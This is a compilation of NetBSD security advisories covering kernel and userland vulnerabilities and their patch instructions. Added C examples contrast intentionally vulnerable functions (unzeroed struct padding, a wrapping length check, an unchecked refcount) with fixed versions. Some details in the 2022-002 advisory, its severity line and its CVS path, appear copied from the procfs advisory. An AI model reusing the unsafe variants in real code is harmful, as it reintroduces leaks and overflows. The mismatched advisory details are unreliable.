reboot the system.

The fixed source may be obtained from the NetBSD CVS repository.  The
following instructions briefly summarize how to upgrade your kernel.
In these instructions, replace:

        ARCH     with your architecture (from uname -m), and
        KERNCONF with the name of your kernel configuration file.

To update from CVS, re-build, and re-install the kernel:

        # cd src
        # cvs update -dP sys
        # ./build.sh kernel=KERNCONF
        # mv /netbsd /netbsd.old
        # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
        # shutdown -r now

For more information on how to do this, see:

        https://www.NetBSD.org/docs/guide/en/chap-kernel.html


Thanks To
=========

Trend Micro for reporting the bug for the stat conversion functions and
Taylor Campbell for auditing the kernel for more instances.


Revision History
================

2023-06-28      Initial release


More Information
================

Advisories may be updated as new information becomes available.  The
most recent version of this advisory (PGP signed) can be found at
        https://cdn.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2023-NNN.txt.asc

Information about NetBSD and NetBSD security can be found at
        https://www.NetBSD.org/
        https://www.NetBSD.org/Security/


Copyright 2023, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.

$NetBSD: NetBSD-SA2023-003.txt,v 1.1 2023/06/28 15:32:44 christos Exp $
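The Technical Details above describe the bug class in one sentence; the following added example (not NetBSD kernel code) makes it observable in userland. struct sample_stat is a constructed stand-in for a kernel structure handed to copyout(9): a 16-bit field followed by a 64-bit one leaves padding that field-by-field assignment never writes. The caller poisons the object first to play the role of stale stack memory, then counts how many poison bytes survive in the non-field bytes after each fill. Clearing the whole object before setting its fields is the generic remedy for this class; the example does not reproduce the specific NetBSD commits.

```c
/*
 * Added example, not NetBSD kernel code: compiler padding in a struct
 * that is copied out to userland, and the zeroing that prevents the leak.
 */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

struct sample_stat {
	uint16_t st_mode;	/* followed by padding (6 bytes on LP64) */
	uint64_t st_size;
	uint32_t st_uid;	/* followed by tail padding on LP64 */
};

/* VULNERABLE: only the named fields are written.  Whatever was in the
 * object before (stack or slab contents) remains in the padding bytes
 * and would be copied out with the rest. */
void
fill_stat_unsafe(struct sample_stat *out, uint16_t mode, uint64_t size,
    uint32_t uid)
{
	out->st_mode = mode;
	out->st_size = size;
	out->st_uid = uid;
}

/* FIXED: clear the whole object first, then set the fields, so every
 * byte that reaches userland has a defined value. */
void
fill_stat_safe(struct sample_stat *out, uint16_t mode, uint64_t size,
    uint32_t uid)
{
	memset(out, 0, sizeof(*out));
	out->st_mode = mode;
	out->st_size = size;
	out->st_uid = uid;
}

/* True if byte offset off lies inside field f of struct st. */
#define IN_FIELD(off, st, f) \
	((off) >= offsetof(st, f) && \
	 (off) < offsetof(st, f) + sizeof(((st *)0)->f))

/* Count bytes outside the named fields that still hold the poison value
 * the caller filled the object with. */
int
leaked_padding_bytes(const struct sample_stat *s, unsigned char poison)
{
	const unsigned char *p = (const unsigned char *)s;
	int leaked = 0;
	size_t i;

	for (i = 0; i < sizeof(*s); i++) {
		if (IN_FIELD(i, struct sample_stat, st_mode) ||
		    IN_FIELD(i, struct sample_stat, st_size) ||
		    IN_FIELD(i, struct sample_stat, st_uid))
			continue;
		if (p[i] == poison)
			leaked++;
	}
	return leaked;
}

/* Poison an object (standing in for stale kernel memory), fill it the
 * unsafe or the safe way, and return how many poison bytes survive. */
int
demo_padding_leak(int use_safe)
{
	struct sample_stat st;

	memset(&st, 0xAA, sizeof(st));
	if (use_safe)
		fill_stat_safe(&st, 0644, 4096, 1000);
	else
		fill_stat_unsafe(&st, 0644, 4096, 1000);
	return leaked_padding_bytes(&st, 0xAA);
}
```

The exact number of leaked bytes depends on the target ABI (the fields total 14 bytes, the rest of sizeof(struct sample_stat) is padding), which is why auditing for this bug class has to be done per structure rather than by inspection of the field list alone.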
NetBSD Security Advisory 2023-002: Various compatibility syscall memory access issues
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

NetBSD Security Advisory 2023-002
=================================

Topic:          Various compatibility syscall memory access issues

Version:        NetBSD-current:         affected before 2020-05-15
                NetBSD 10.0_BETA:       not affected
                NetBSD 9.3:             not affected
                NetBSD 9.2:             not affected
                NetBSD 9.1:             not affected
                NetBSD 9.0:             affected
                NetBSD 8.2:             affected
                NetBSD 8.1:             affected
                NetBSD 8.0:             affected

Severity:       Local users can crash the machine

Fixed:          NetBSD-current:         2020-05-15
                NetBSD-10 branch:       N/A
                NetBSD-9 branch:        2020-05-15
                NetBSD-8 branch:        2020-05-25

Please note that NetBSD releases prior to 8.2 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

Fix various info leaks, out of bound accesses, uses of uninitialized
values, direct access to userland variables from kernel space, and
memory leaks in system calls implemented for the compatibility
subsystems.  These bugs affect:

- compat_netbsd32
- compat_linux
- compat_linux32


Technical Details
=================

The following bugs were discovered using memory and address sanitizers:

- Index out of bounds (kernel crash)
        https://mail-index.netbsd.org/source-changes/2019/08/23/msg108420.html

- Incorrect buffer handling (memory corruption)
        https://mail-index.netbsd.org/source-changes/2019/08/24/msg108454.html
        https://mail-index.netbsd.org/source-changes/2020/03/14/msg115069.html [*]

- Missing free of temporary buffer (memory leak)
        https://mail-index.netbsd.org/source-changes/2019/08/24/msg108455.html

- Bugs in the implementation of linux32_sys_get_robust_list (missing
  functionality)
        https://mail-index.netbsd.org/source-changes/2019/08/23/msg108428.html

- Direct user data access (not working with SMAP)
        https://mail-index.netbsd.org/source-changes/2019/08/24/msg108449.html

- Incorrect error code returned (diagnostic)
        https://mail-index.netbsd.org/source-changes/2019/08/23/msg108425.html

- Insufficient zero initialization of arguments to compatibility
  syscalls (information leak)
        https://mail-index.netbsd.org/source-changes/2020/01/01/msg112486.html
        https://mail-index.netbsd.org/source-changes/2019/08/23/msg108407.html
        https://mail-index.netbsd.org/source-changes/2019/08/23/msg108408.html
        https://mail-index.netbsd.org/source-changes/2019/08/23/msg108409.html
        https://mail-index.netbsd.org/source-changes/2019/08/23/msg108414.html
        https://mail-index.netbsd.org/source-changes/2019/08/23/msg108415.html
        https://mail-index.netbsd.org/source-changes/2019/08/23/msg108417.html
        https://mail-index.netbsd.org/source-changes/2019/08/23/msg108427.html
        https://mail-index.netbsd.org/source-changes/2019/08/23/msg108429.html
        https://mail-index.netbsd.org/source-changes/2019/08/23/msg108430.html
        https://mail-index.netbsd.org/source-changes/2020/02/22/msg114240.html [*]
        https://mail-index.netbsd.org/source-changes/2020/02/26/msg114478.html [*]
        https://mail-index.netbsd.org/source-changes/2020/05/15/msg117350.html [**]

- Debug printing fixes (cosmetic)
        https://mail-index.netbsd.org/source-changes/2019/08/23/msg108421.html
        https://mail-index.netbsd.org/source-changes/2019/08/23/msg108426.html
        https://mail-index.netbsd.org/source-changes/2019/08/24/msg108456.html

- Uninitialized memory access (harmless)
        https://mail-index.netbsd.org/source-changes/2019/08/23/msg108423.html
        https://mail-index.netbsd.org/source-changes/2019/08/23/msg108424.html
        https://mail-index.netbsd.org/source-changes/2019/09/08/msg108869.html
        https://mail-index.netbsd.org/source-changes/2020/04/19/msg116378.html [*]
        https://mail-index.netbsd.org/source-changes/2020/05/14/msg117328.html [*]

- Incorrect size passed to copyin (harmless stack buffer overflow)
        https://mail-index.netbsd.org/source-changes/2020/01/01/msg112456.html


Solutions and Workarounds
=========================

Update the kernel to a fixed version and reboot.

There are pre-built binaries for all architectures and NetBSD versions
at:

        https://nycdn.netbsd.org/pub/NetBSD-daily/

For example you can find the standard GENERIC kernel for NetBSD-9/amd64
at:

        https://nycdn.netbsd.org/pub/NetBSD-daily/netbsd-9/latest/amd64/binary/kernel/netbsd-GENERIC.gz

Alternatively, to build from source for all NetBSD versions, you need to
obtain fixed kernel sources, rebuild and install the new kernel, and
reboot the system.

The fixed source may be obtained from the NetBSD CVS repository.  The
following instructions briefly summarize
NetBSD Security Advisory 2023-001: Multiple buffer overflows in USB drivers
NetBSD Security Advisory 2023-001
=================================

Topic:          Multiple buffer overflows in USB drivers

Version:        NetBSD-current:     affected up to 9.99.32
                NetBSD 10.0_BETA:   not affected
                NetBSD 9.3:         not affected
                NetBSD 9.2:         not affected
                NetBSD 9.1:         not affected
                NetBSD 9.0:         not affected
                NetBSD 8.2:         not affected
                NetBSD 8.1:         affected
                NetBSD 8.0:         affected

Severity:       A malicious USB device can execute code in the kernel

Fixed:          NetBSD-current:     2020-01-01
                NetBSD-10 branch:   N/A
                NetBSD-9 branch:    N/A
                NetBSD-8 branch:    2020-01-02

Please note that NetBSD releases prior to 8.2 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

A malicious USB device can execute code in the kernel.

Technical Details
=================

Multiple buffer overflows in src/sys/dev/usb/uthum.c were found:
sc_{o,f}len are controlled by the USB device. By crafting the former, the
device can leak stack data. By crafting the latter, the device can
overwrite the stack. The combination of the two means the device can ROP
the kernel and obtain code execution (demonstrated with an actual exploit
over vHCI). Additionally, the lengths were not truncated to the size of the
buffers.

Multiple buffer overflows in src/sys/dev/usb/uhid.c were found: in several
places, there was no check to see if size + extra fits into the buffer.

src/sys/dev/usb/ucycom.c: the lengths at attach time were not validated.

Solutions and Workarounds
=========================

Update the kernel to a fixed version and reboot.

There are pre-built binaries for all architectures and NetBSD versions at:

        https://nycdn.netbsd.org/pub/NetBSD-daily/

For example you can find the standard GENERIC kernel for NetBSD-9/amd64 at:

        https://nycdn.netbsd.org/pub/NetBSD-daily/netbsd-9/latest/amd64/binary/kernel/netbsd-GENERIC.gz

Alternatively to build from source for all NetBSD versions, you need to
obtain fixed kernel sources, rebuild and install the new kernel, and reboot
the system. The fixed source may be obtained from the NetBSD CVS repository.

The following instructions briefly summarize how to upgrade your kernel.
In these instructions, replace:

        ARCH     with your architecture (from uname -m), and
        KERNCONF with the name of your kernel configuration file.

To update from CVS, re-build, and re-install the kernel:

        # cd src
        # cvs update -d -P sys/dev/usb
        # ./build.sh kernel=KERNCONF
        # mv /netbsd /netbsd.old
        # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
        # shutdown -r now

For more information on how to do this, see:

        https://www.NetBSD.org/docs/guide/en/chap-kernel.html

Thanks To
=========

Maxime Villard for finding and fixing the vulnerability.

Revision History
================

        2023-06-28      Initial release

More Information
================

Advisories may be updated as new information becomes available. The most
recent version of this advisory (PGP signed) can be found at

        https://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2023-NNN.txt.asc

Information about NetBSD and NetBSD security can be found at

        https://www.NetBSD.org/
        https://www.NetBSD.org/Security/

Copyright 2023, The NetBSD Foundation, Inc. All Rights Reserved.
Redistribution permitted only in full, unmodified form.

$NetBSD: NetBSD-SA2023-001.txt,v 1.1 2023/06/28 15:28:57 christos Exp $
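The uthum.c and uhid.c findings above come down to trusting lengths the device supplies. The following C sketch is an added example, not code from the NetBSD drivers: it validates device-controlled report lengths at attach time and shows a wrap-free "size + extra fits" check beside the naive form that overflows. The softc layout, buffer size and function names are assumptions for illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define REPORT_BUF_SIZE 64   /* constructed: fixed report buffer size */

/* Hypothetical driver softc, loosely modelled on the fields the advisory
 * names; olen/flen arrive from descriptors the device controls. */
struct usb_hid_sc {
    uint8_t buf[REPORT_BUF_SIZE];
    size_t  olen;   /* output report length, device-supplied */
    size_t  flen;   /* feature report length, device-supplied */
};

/* The unsafe shape of the uhid check: size + extra can wrap around in
 * size_t, so an enormous "size" passes and the later copy runs far past
 * the buffer. Kept only to show the pitfall. */
bool fits_naive(size_t size, size_t extra, size_t bufsize)
{
    return size + extra <= bufsize;
}

/* Wrap-free version: once size <= bufsize the subtraction cannot underflow,
 * so the comparison is exact for every input. */
bool fits(size_t size, size_t extra, size_t bufsize)
{
    return size <= bufsize && extra <= bufsize - size;
}

/* Attach-time validation of device-supplied lengths. A zero length or one
 * larger than the buffer means a malformed (or hostile) device: refuse to
 * attach instead of trusting it. Returns true when the lengths are sane. */
bool hid_attach(struct usb_hid_sc *sc, size_t dev_olen, size_t dev_flen)
{
    if (dev_olen == 0 || dev_olen > sizeof sc->buf)
        return false;
    if (dev_flen == 0 || dev_flen > sizeof sc->buf)
        return false;
    memset(sc->buf, 0, sizeof sc->buf);   /* no stale data to leak */
    sc->olen = dev_olen;
    sc->flen = dev_flen;
    return true;
}

/* Store a device-provided report of "size" bytes at "offset" in the softc
 * buffer (the "size + extra" situation from uhid). Returns the number of
 * bytes stored, or -1 when the report would not fit. */
int hid_store_report(struct usb_hid_sc *sc, size_t offset,
                     const uint8_t *data, size_t size)
{
    if (!fits(offset, size, sizeof sc->buf))
        return -1;
    memcpy(sc->buf + offset, data, size);
    return (int)size;
}
```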
NetBSD Security Advisory 2022-004: procfs(5) missing permission checks
NetBSD Security Advisory 2022-004
=================================

Topic:          procfs(5) missing permission checks

Version:        NetBSD-current:     affected prior to 2022-06-18
                NetBSD 9.2:         affected
                NetBSD 8.2:         affected

Severity:       Malicious user may read from file descriptors opened by
                other processes.

Fixed:          NetBSD-current:     June 17, 2022
                NetBSD-9 branch:    June 17, 2022
                NetBSD-8 branch:    June 17, 2022

Please note that NetBSD releases prior to 8 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

Due to missing permission checks it was possible to reuse open descriptors
which are exposed in the procfs(5) [pid]/fd/ directory. It might allow a
malicious user to bypass permission checks and read data from an opened
descriptor under some circumstances.

Technical Details
=================

The fd/ directory, available per process in procfs(5), exposes all file
descriptors opened by a process, because of a missing VOP_ACCESS check
during the VOP_LOOKUP(9) operation. Due to the lack of proper access
verification, a malicious user can open files from the file descriptor
directory, because the permissions of the directory are not effectively
checked.

An example scenario that leads to a data leak is as follows: a file with
permissions 644 is protected by directory permissions 700. If a process has
opened the file, a malicious user can obtain a file descriptor for it by
opening it directly from the fd/ directory exposed by procfs(5).

Solutions and Workarounds
=========================

Immediate workaround: unmount procfs(5) and mark it "noauto" in /etc/fstab.
Please note that some programs may need access to procfs(5) in order to
work correctly.

To apply a fixed version from a releng build, fetch a fitting
kern-GENERIC.tgz from nycdn.NetBSD.org and extract the fixed binaries:

        cd /var/tmp
        ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/BUILD/ARCH/binary/sets/kern-GENERIC.tgz
        cd /
        tar xzpf /var/tmp/kern-GENERIC.tgz

with the following replacements:

        REL   = the release version you are using
        BUILD = the source date of the build. 20220618 and later will fit
        ARCH  = your system's architecture

The following instructions describe how to upgrade your kernel by updating
your source tree and rebuilding and installing a new version of the kernel.

For all NetBSD versions, you need to obtain fixed kernel sources, rebuild
and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository. The
following instructions briefly summarise how to upgrade your kernel. In
these instructions, replace:

        ARCH     with your architecture (from uname -m), and
        KERNCONF with the name of your kernel configuration file.

To update from CVS, re-build, and re-install the kernel:

        # cd src
        # cvs update -d -P sys/miscfs/procfs/procfs_vnops.c
        # ./build.sh kernel=KERNCONF
        # mv /netbsd /netbsd.old
        # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
        # shutdown -r now

For more information on how to do this, see:

        https://www.NetBSD.org/docs/guide/en/chap-kernel.html

Thanks To
=========

Mateusz Kocielski (shm@) who analyzed this problem and supplied the fixes.

Revision History
================

        2022-10-04      Initial release

More Information
================

Advisories may be updated as new information becomes available. The most
recent version of this advisory (PGP signed) can be found at

        https://cdn.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2022-004.txt.asc

Information about NetBSD and NetBSD security can be found at

        https://www.NetBSD.org/
        https://www.NetBSD.org/support/security/

Copyright 2022, The NetBSD Foundation, Inc. All Rights Reserved.
Redistribution permitted only in full, unmodified form.

$Id: NetBSD-SA2022-004.txt,v 1.1 2022/10/04 13:48:36 christos Exp $
NetBSD Security Advisory 2022-003: Race condition in mail.local(8)
NetBSD Security Advisory 2022-003
=================================

Topic:          Race condition in mail.local(8)

Version:        NetBSD-current:     affected prior to 2022-05-17
                NetBSD 10:          not affected
                NetBSD 9*:          affected
                NetBSD 8*:          affected

Severity:       Local user may be able to own any file or append arbitrary
                data

Fixed:          NetBSD-current:     May 17, 2022
                NetBSD-9 branch:    May 17, 2022
                NetBSD-8 branch:    May 17, 2022

Please note that NetBSD releases prior to 8.2 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

A race condition exists in the mail.local(8) (/usr/libexec/mail.local)
program, which is setuid root. It may be exploited to change the ownership
of, or append arbitrary data to, an arbitrary file. A malicious local user
may exploit the race condition to acquire write permission to a critical
system file, and leverage that to acquire escalated privileges.

This was originally addressed in NetBSD-SA2016-006 and has been assigned
CVE-2016-6253. The fix proved ineffective and had to be fixed again, which
is the reason for this new advisory.

Technical Details
=================

The user mailbox (typically /var/mail/$USER) to which a message is
delivered is checked using lstat(2) to verify that the file is not a
symlink. If the file is not a symlink, it is opened. If the file does not
exist, it is created with another open(2) call. There is a tiny window
between the two open calls in which the attacker could replace it with a
symlink to an arbitrary file, and the mail.local program would then chown
the file the symlink points to.

Solutions and Workarounds
=========================

A potential workaround is to remove /usr/libexec/mail.local, if you use
postfix(1) as the only way of delivering mail. The mail.local(8) program
was used by sendmail(8), which is no longer shipped with NetBSD (postfix(1)
is currently the default MTA). Whether other MTAs depend on mail.local(8)
should be checked manually.

To apply a fixed version from a releng build, fetch a fitting
base.{tgz,tar.xz} from nycdn.NetBSD.org and extract the fixed binaries:

        cd /var/tmp
        ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/BUILD/ARCH/binary/sets/base.tgz
        cd /
        tar xzpf /var/tmp/base.tgz libexec/mail.local

with the following replacements:

        REL   = the release version you are using
        BUILD = the source date of the build. %DATE%* and later will fit
        ARCH  = your system's architecture

The following instructions describe how to upgrade your mail.local(8)
binaries by updating your source tree and rebuilding and installing a new
version of mail.local(8).

* NetBSD-current:

        Systems running NetBSD-current dated from before 2022-05-18 should
        be upgraded to NetBSD-current dated 2022-05-18 or later.

        The following files/directories need to be updated from the
        netbsd-current CVS branch (aka HEAD):

                src/libexec/mail.local

        To update from CVS, re-build, and re-install mail.local(8):

                # cd src
                # cvs update -d -P libexec/mail.local
                # cd libexec/mail.local
                # make USETOOLS=no cleandir dependall
                # make USETOOLS=no install

* NetBSD 8.* or 9.*:

        Systems running NetBSD 8.* or 9.* sources dated from before
        2022-05-18 should be upgraded from NetBSD 8.* or 9.* sources dated
        2022-05-18 or later.

        The following files/directories need to be updated from the
        netbsd-8 or netbsd-9 branches:

                src/libexec/mail.local

        To update from CVS, re-build, and re-install mail.local(8):

                # cd src
                # cvs update -r -d -P libexec/mail.local
                # cd libexec/mail.local
                # make USETOOLS=no cleandir dependall
                # make USETOOLS=no install

Thanks To
=========

Jan Schaumann for pointing out the ineffectiveness of the original
2016-07-19 fix.

Revision History
================

        2022-10-04      Initial release

More Information
================

Advisories may be updated as new information becomes available. The most
recent version of this advisory (PGP signed) can be found at

        https://cdn.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2022-003.txt.asc

Information about NetBSD and NetBSD security can be found at

        https://www.NetBSD.org/
        https://www.NetBSD.org/Security/

Copyright 2022, The NetBSD Foundation, Inc. All Rights Reserved.
Redistribution permitted only in full, unmodified form.

$NetBSD: NetBSD-SA2022-003.txt,v 1.1 2022/10/04 13:48:16 christos Exp $
NetBSD Security Advisory 2022-002: Coredump credential reference count leak
NetBSD Security Advisory 2022-002
=================================

Topic:          Coredump credential reference count leak

Version:        NetBSD-current:     affected prior to 2022-09-10
                NetBSD 9.2:         affected
                NetBSD 8.2:         affected

Severity:       Malicious user may read from file descriptors opened by
                other processes.

Fixed:          NetBSD-current:     September 10, 2022
                NetBSD-9 branch:    September 10, 2022
                NetBSD-8 branch:    September 10, 2022

Please note that NetBSD releases prior to 8 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

The coredump handling code always leaks a reference to the dumped process's
cred structure. An attacker may cause the reference count to overflow,
leading to a use after free (UAF).

Solutions and Workarounds
=========================

Set the coredump resource limit to 0 to prevent coredumps in the system.

To apply a fixed version from a releng build, fetch a fitting
kern-GENERIC.tgz from nycdn.NetBSD.org and extract the fixed binaries:

        cd /var/tmp
        ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/BUILD/ARCH/binary/sets/kern-GENERIC.tgz
        cd /
        tar xzpf /var/tmp/kern-GENERIC.tgz

with the following replacements:

        REL   = the release version you are using
        BUILD = the source date of the build. 20220910 and later will fit
        ARCH  = your system's architecture

The following instructions describe how to upgrade your kernel by updating
your source tree and rebuilding and installing a new version of the kernel.

For all NetBSD versions, you need to obtain fixed kernel sources, rebuild
and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository. The
following instructions briefly summarise how to upgrade your kernel. In
these instructions, replace:

        ARCH     with your architecture (from uname -m), and
        KERNCONF with the name of your kernel configuration file.

To update from CVS, re-build, and re-install the kernel:

        # cd src
        # cvs update -d -P sys/miscfs/procfs/procfs_vnops.c
        # ./build.sh kernel=KERNCONF
        # mv /netbsd /netbsd.old
        # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
        # shutdown -r now

For more information on how to do this, see:

        https://www.NetBSD.org/docs/guide/en/chap-kernel.html

Thanks To
=========

Chris J-D for discovering and analyzing the problem and proposing a fix.

Revision History
================

        2022-10-02      Initial release

More Information
================

Advisories may be updated as new information becomes available. The most
recent version of this advisory (PGP signed) can be found at

        https://cdn.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2022-002.txt.asc

Information about NetBSD and NetBSD security can be found at

        https://www.NetBSD.org/
        https://www.NetBSD.org/support/security/

Copyright 2022, The NetBSD Foundation, Inc. All Rights Reserved.
Redistribution permitted only in full, unmodified form.

$Id: NetBSD-SA2022-002.txt,v 1.1 2022/10/02 14:02:28 christos Exp $
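An added model, not NetBSD's kauth code, of why the leaked credential reference above turns into a use-after-free: with an 8-bit counter for brevity, repeated leaked holds wrap the count so that a legitimate release frees the object while another holder still uses it, whereas a hold that refuses to wrap keeps the leak a mere leak. Struct and function names are assumptions for illustration.

```c
#include <stdbool.h>
#include <stdint.h>

/* Toy credential object with a deliberately 8-bit reference count so the
 * wraparound is reachable in a short run. Hypothetical; not kauth_cred_t. */
struct cred {
    uint8_t refcnt;
    bool    freed;
};

/* Unchecked hold: the shape that lets a leaked reference become a UAF,
 * because nothing stops the counter wrapping through zero. */
void cred_hold_unchecked(struct cred *c)
{
    c->refcnt++;
}

/* Checked hold: refuse (a kernel would panic or saturate) instead of
 * wrapping. Returns false when the hold was not granted. */
bool cred_hold(struct cred *c)
{
    if (c->refcnt == UINT8_MAX)
        return false;
    c->refcnt++;
    return true;
}

/* Release: the object is freed when the count reaches zero. Returns true if
 * the object is (now) freed. */
bool cred_rele(struct cred *c)
{
    if (--c->refcnt == 0)
        c->freed = true;
    return c->freed;
}

/* Scenario from the advisory: two legitimate holders share the cred (say
 * the process and a thread), and a coredump path takes a hold it never
 * releases. Run "dumps" such leaks, then let one legitimate holder release.
 * Returns true if that release freed the cred while the other legitimate
 * holder still uses it, i.e. the leak produced a dangling reference. */
bool leak_reaches_uaf(unsigned dumps, bool checked)
{
    struct cred c = { .refcnt = 2, .freed = false };

    for (unsigned i = 0; i < dumps; i++) {
        if (checked)
            cred_hold(&c);            /* refused once saturated: count stays */
        else
            cred_hold_unchecked(&c);  /* wraps: 2 + 255 -> 1 */
    }
    cred_rele(&c);                    /* first legitimate holder exits */
    return c.freed;                   /* second holder's reference dangling? */
}
```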
NetBSD Security Advisory 2022-001:
NetBSD Security Advisory 2021-002: Incorrect permissions in kernfs
NetBSD Security Advisory 2021-002
=================================

Topic:          Incorrect permissions in kernfs

Version:        NetBSD-current:     affected between March 3, 2020 and
                                    July 6, 2021
                NetBSD 9.2:         affected
                NetBSD 9.1:         affected
                NetBSD 9.0:         affected
                NetBSD 8.*:         not affected

Severity:       Local user may read any file on the root volume

Fixed:          NetBSD-current:     July 6, 2021
                NetBSD-9 branch:    July 6, 2021

Please note that NetBSD releases prior to 8.0 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

The /kern file system contains references to the device the root volume
was mounted from. It was discovered that the permissions were incorrect and
allow any local user to read the device, thus allowing any local user to
read any file on the root volume.

Technical Details
=================

The files /kern/rootdev and /kern/rrootdev are internally-generated device
special files that refer to the device the root volume was mounted from.
Until July 6, 2021 they were presented as mode 444 (readable to all users).

Prior to February 3, 2020 (February 12 on the NetBSD-9 branch, then at
9.0_RC2) this was harmless because these device special files did not
actually work; however, that problem was corrected without noticing that
the permissions were unsafe.

Solutions and Workarounds
=========================

Immediate workaround: unmount /kern and mark it "noauto" in /etc/fstab.
This will work (without impacting system functionality) for all systems
other than Xen DOM0. Unfortunately Xen requires access to other elements in
kernfs.

Note that while chmod on the offending files appears to succeed, it does
not take and is not an adequate workaround.

To fix the underlying problem, update the kernel.

To apply a fixed version from a releng build, fetch a fitting
kern-GENERIC.tar.xz, kern-GENERIC_KASLR.tar.xz, kern-XEN3_DOM0.tar.xz, or
kern-XEN3_DOMU.tar.xz (depending on which kernel you are using; uname -v
will show, among other things, the name of the running kernel) from
nycdn.NetBSD.org and extract the fixed binaries:

        cd /var/tmp
        ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/BUILD/ARCH/binary/sets/kern-GENERIC.tar.xz
            (or whichever)
        cd /
        tar xzpf /var/tmp/kern-GENERIC.tar.xz

with the following replacements:

        REL   = the release version you are using
        BUILD = the source date of the build. 202107060400Z and later will fit
        ARCH  = your system's architecture

The following instructions describe how to upgrade your kernel by updating
your source tree and rebuilding and installing a new version.

For affected NetBSD versions, you need to obtain fixed kernel sources,
rebuild and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository. The
following instructions briefly summarise how to upgrade your kernel. In
these instructions, replace:

        ARCH     with your architecture (from uname -m), and
        KERNCONF with the name of your kernel configuration file.

To update from CVS, re-build, and re-install the kernel:

        # cd src
        # cvs update -d -P sys/miscfs/kernfs/kernfs_vnops.c
        # ./build.sh kernel=KERNCONF
        # mv /netbsd /netbsd.old
        # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
        # shutdown -r now

For more information on how to do this, see:

        http://www.NetBSD.org/guide/en/chap-kernel.html

Thanks To
=========

David A. Holland
Martin Husemann
Jonathan A. Kollasch
Jared McNeill

Revision History
================

        2021-07-14      Initial release

More Information
================

Advisories may be updated as new information becomes available. The most
recent version of this advisory (PGP signed) can be found at

        http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2021-NNN.txt.asc

Information about NetBSD and NetBSD security can be found at

        http://www.NetBSD.org/ and
        http://www.NetBSD.org/Security/.

Copyright 2021, The NetBSD Foundation, Inc. All Rights Reserved.
Redistribution permitted only in full, unmodified form.

$NetBSD: NetBSD-SA2021-002.txt,v 1.1 2021/07/14 17:48:26 christos Exp $
NetBSD Security Advisory 2021-001: Predictable ID disclosures in IPv4 and IPv6
NetBSD Security Advisory 2021-001
=================================

Topic:          Predictable ID disclosures in IPv4 and IPv6

Version:        NetBSD-current:     affected
                NetBSD 9.1:         affected
                NetBSD 8.2:         affected

Severity:       Possible data exfiltration from firewalled or NATed networks

Fixed:          NetBSD-current:     March 9, 2021
                NetBSD-9 branch:    March 9, 2021
                NetBSD-8 branch:    March 9, 2021

Please note that NetBSD releases prior to 8.2 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

IP ID randomization was not enabled by default and the randomization
algorithms were not strong enough.

Technical Details
=================

1. IPv4 and IPv6 fragment ids were not randomly generated by default.
   Furthermore the randomization algorithms were not strong enough.

2. The TCP ISS random generation had an information leak.

3. The IPv6 flow label generation algorithm was not strong enough.

Solutions and Workarounds
=========================

For all NetBSD versions, you need to obtain fixed kernel sources, rebuild
and install the new kernel, and reboot the system.

The following revisions fix the issues:

        src/sys/netinet/in_var.h        1.99,1.102
        src/sys/netinet/ip6.h           1.30
        src/sys/netinet/ip_input.c      1.400
        src/sys/netinet/tcp_subr.c      1.285,1.286
        src/sys/netinet/tcp_timer.c     1.96
        src/sys/netinet6/ip6_id.c       1.20
        src/sys/netinet6/ip6_var.h      1.88

The fixed source may be obtained from the NetBSD CVS repository. The
following instructions briefly summarise how to upgrade your kernel. In
these instructions, replace:

        ARCH     with your architecture (from uname -m), and
        KERNCONF with the name of your kernel configuration file.

To update from CVS, re-build, and re-install the kernel:

        # cd src
        # cvs update -d -P sys/netinet sys/netinet6
        # ./build.sh kernel=KERNCONF
        # mv /netbsd /netbsd.old
        # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
        # shutdown -r now

For more information on how to do this, see:

        https://www.NetBSD.org/docs/guide/en/chap-kernel.html

Thanks To
=========

Amit Klein for reporting these vulnerabilities and Taylor R. Campbell for
fixing them.

More Information
================

Advisories may be updated as new information becomes available. The most
recent version of this advisory (PGP signed) can be found at

        https://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2021-001.txt.asc

Information about NetBSD and NetBSD security can be found at

        https://www.NetBSD.org/
        https://www.NetBSD.org/Security/

Copyright 2021, The NetBSD Foundation, Inc. All Rights Reserved.
Redistribution permitted only in full, unmodified form.
NetBSD Security Advisory 2021-001: Predictable ID disclosures in IPv4 and IPv6
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2021-001
                 =================================

Topic:          Predictable ID disclosures in IPv4 and IPv6

Version:        NetBSD-current:    affected
                NetBSD 9.1:        affected
                NetBSD 8.2:        affected

Severity:       Possible data exfiltration from firewalled or NATed networks

Fixed:          NetBSD-current:    March 9, 2021
                NetBSD-9 branch:   March 9, 2021
                NetBSD-8 branch:   March 9, 2021

Please note that NetBSD releases prior to 8.2 are no longer supported.
